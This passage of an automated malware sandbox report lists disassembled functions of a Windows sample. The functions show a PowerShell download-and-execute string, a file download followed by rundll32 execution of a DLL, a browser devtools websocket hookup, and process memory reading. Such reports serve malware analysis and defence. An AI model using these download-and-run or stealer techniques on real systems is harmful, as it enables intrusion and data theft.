                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: memcpy$lstrcat$??3@InternetOpenmemchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                                • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                • API String ID: 2141826376-2676143373
                                                                                                                                                                                                                                                                                • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                                Function 00412400 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • ShellExecuteEx.SHELL32(?), ref: 00412560
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteShellSystemTimememset
                                                                                                                                                                                                                                                                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                • API String ID: 1675527290-38637897
                                                                                                                                                                                                                                                                                • Opcode ID: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                • Instruction ID: 334dd5afd32dd1eb1b8252b2cfcba07153a0a01eb84f6ed827c6dd8a75e550bd
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6418A303103146BD654BB6299A6BAF7A595BC4758F40045E784B1F283CEBC5CC5C7EE
                                                                                                                                                                                                                                                                                Function 00411D20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411E21
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00411E3C
                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411E4B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process$Heap$AllocCloseHandleOpenTerminatewsprintf
                                                                                                                                                                                                                                                                                • String ID: %hs
                                                                                                                                                                                                                                                                                • API String ID: 2756667156-2783943728
                                                                                                                                                                                                                                                                                • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                                Function 0040F9B0 Relevance: 10.8, APIs: 7, Instructions: 265stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                                • Opcode ID: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                                Function 004120F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 239COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404100: InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • ShellExecuteEx.SHELL32(?), ref: 00412374
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internetlstrcpy$CloseFileHandle$Openlstrcatlstrlen$CreateExecuteReadShellSystemTimeWritememset
                                                                                                                                                                                                                                                                                • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                • API String ID: 1030512983-3594953769
                                                                                                                                                                                                                                                                                • Opcode ID: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                • Instruction ID: 94f81c9545e4cc3746d51ce8cbcf5f5300d4dbcdb4f20de0f2bf9a4aeae790fb
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87815170A0021857DB14FBB2CDEAAEF7B69AF44748F40145EB4066B182DEBC5DC5C7A8
                                                                                                                                                                                                                                                                                Function 0041D590 Relevance: 9.1, APIs: 6, Instructions: 118timeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
